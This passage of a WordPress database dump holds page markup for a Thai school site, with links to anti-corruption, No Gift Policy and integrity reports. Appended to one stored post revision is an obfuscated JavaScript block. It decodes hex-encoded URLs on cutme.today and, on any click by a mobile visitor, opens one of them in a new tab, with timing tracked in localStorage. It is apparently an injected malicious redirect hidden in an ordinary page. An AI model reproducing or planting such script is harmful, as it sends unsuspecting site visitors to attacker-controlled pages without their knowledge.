wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-21 10:03:22','2024-08-21 03:03:22','',871,'http://pakhaeng.ssk.in.th/?p=1042',0,'revision','',0),
(1043,1,'2024-08-21 10:07:22','2024-08-21 03:07:22','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button 